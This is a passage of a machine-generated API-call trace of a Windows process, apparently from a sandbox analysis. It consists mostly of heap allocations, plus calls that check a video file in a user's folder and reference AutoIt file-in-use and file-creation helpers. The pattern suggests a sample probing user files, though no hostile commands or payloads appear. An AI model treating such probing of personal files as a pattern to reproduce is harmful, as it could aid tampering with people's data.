RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a088 [0099.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0099.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0099.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a088 | out: hHeap=0x1780000) returned 1 [0099.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0099.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0099.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0099.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c38 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0099.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0099.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0099.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0099.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0099.236] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0099.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0099.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0099.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0099.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0099.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0099.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0099.236] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0099.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0099.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0099.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0099.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0099.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0099.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0099.236] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\NLad7.avi", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe64f3ab0, ftCreationTime.dwHighDateTime=0x1d5e4a0, ftLastAccessTime.dwLowDateTime=0x82f1e440, ftLastAccessTime.dwHighDateTime=0x1d5eb1c, ftLastWriteTime.dwLowDateTime=0x82f1e440, ftLastWriteTime.dwHighDateTime=0x1d5eb1c, nFileSizeHigh=0x0, nFileSizeLow=0x16f6b, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="NLad7.avi", cAlternateFileName="")) returned 0x41ac140 [0099.237] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0099.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0099.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0099.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0099.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0099.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0099.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0099.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0099.237] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0099.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0099.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0099.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0099.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0099.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0099.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0099.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0099.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0099.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0099.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d40 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0099.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0099.238] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0099.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0099.238] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0099.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0099.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0099.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0099.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0099.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0099.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c08 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0099.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0099.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0099.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0099.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0099.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0099.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0099.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0099.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0099.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0099.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0099.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0099.241] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0099.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0099.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0099.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0099.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0099.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0099.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0099.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0099.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0099.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0099.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0099.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0099.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0099.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0099.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0099.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0099.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0099.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0099.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0099.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0099.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0099.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0099.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0099.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0099.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0099.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0099.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0099.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0099.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0099.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0099.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0099.245] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0099.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0099.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0099.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0099.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0099.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0099.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0099.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0099.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0099.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0099.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0099.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0099.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0099.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0099.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: 